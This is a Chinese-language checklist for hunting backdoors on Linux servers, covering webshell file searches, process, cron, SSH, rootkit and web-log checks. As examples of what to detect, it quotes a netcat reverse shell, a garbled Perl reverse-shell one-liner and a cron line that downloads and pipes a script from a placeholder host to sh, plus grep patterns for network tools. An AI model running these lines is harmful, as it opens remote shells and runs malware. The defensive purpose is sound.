聲明!本文章所有的工具分享僅僅只是供大家學習交流為主,切勿用于非法用途,如有任何觸犯法律的行為,均與本人及團隊無關!!!
1. 檢查異常文件
(1)查找最近修改的文件
# 查找最近3天內被修改的文件(重點檢查Web目錄)
find /var/www/ -type f -mtime -3 -ls | sort -k8
● 重點關注:.php、.jsp、.asp、.sh 等可執行文件。
● 隱藏文件:檢查 /tmp/、/dev/shm/ 等臨時目錄。
(2)查找可疑文件名
# 查找包含常見后門特征的文件名
find / -name "*shell*" -o -name "*backdoor*" -o -name "*b374k*" -o -name "*c99*" -ls
● 常見WebShell:shell.php、b374k.php、c99.php、wso.php。
● 隱藏技巧:攻擊者可能使用 …gif.php 偽裝成圖片。
(3)查找大文件(可能含加密數據)
find / -type f -size +5M -exec ls -lh {} \; | grep -v "log\|cache"
● 異常大文件:可能是攻擊者存放的加密數據或惡意代碼。
2. 檢查異常進程
(1)查看運行中的可疑進程
ps aux | grep -E "(sh|bash|perl|python|nc|ncat|socat|wget|curl|\.\/)"
● 常見后門進程:
● nc -lvp 4444 -e /bin/bash(反彈Shell)
● perl -e 'use Socket; i = " x . x . x . x " ; i="x.x.x.x"; i="x.x.x.x";p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,ineta?ton(i)));open(STDIN,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);
(2)檢查隱藏進程
# 查看所有進程(包括無二進制文件的進程)
top -c
● 異常進程:無對應文件、占用高CPU、奇怪命令行參數。
(3)檢查網絡連接
netstat -antp | grep ESTABLISHED
ss -tulnp
● 可疑外聯IP:連接到未知IP的 bash、sh、nc 進程。
3. 檢查定時任務
(1)查看用戶級定時任務
crontab -l
(2)檢查系統級定時任務
ls -la /etc/cron.*
cat /etc/crontab
● 異常任務:如 wget http://x.x.x.x/malware.sh | sh。
4. 檢查SSH后門
(1)查看SSH登錄記錄
cat /var/log/auth.log | grep "Accepted"
cat /var/log/secure | grep "Accepted" # CentOS
● 異常登錄:陌生IP、非工作時間登錄。
(2)檢查SSH密鑰
ls -la ~/.ssh/authorized_keys
● 攻擊者可能添加自己的公鑰,實現免密登錄。
(3)檢查SSH配置文件
cat /etc/ssh/sshd_config | grep -E "(PermitRootLogin|AllowUsers|Port)"
● 異常配置:PermitRootLogin yes(應禁用root登錄)
5. 檢查內核級Rootkit
(1)檢查系統調用劫持
strace -p <PID> # 跟蹤進程的系統調用
● 異常行為:如 open(“/etc/shadow”) 或 execve(“/bin/sh”)。
(2)使用專用工具檢測
# 安裝并運行Rootkit檢測工具
sudo apt install rkhunter chkrootkit -y
sudo rkhunter --check
sudo chkrootkit
6. 檢查Web日志
(1)查找可疑HTTP請求
cat /var/log/apache2/access.log | grep -E "(cmd=|eval|system|passthru|shell_exec)"
● 常見攻擊特征:
○ GET /index.php?cmd=whoami
○ POST /upload.php -F “file=@shell.php”
(2)檢查大流量IP
cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10
● 高頻訪問IP:可能是攻擊者在掃描或爆破。
7.總結
)
)
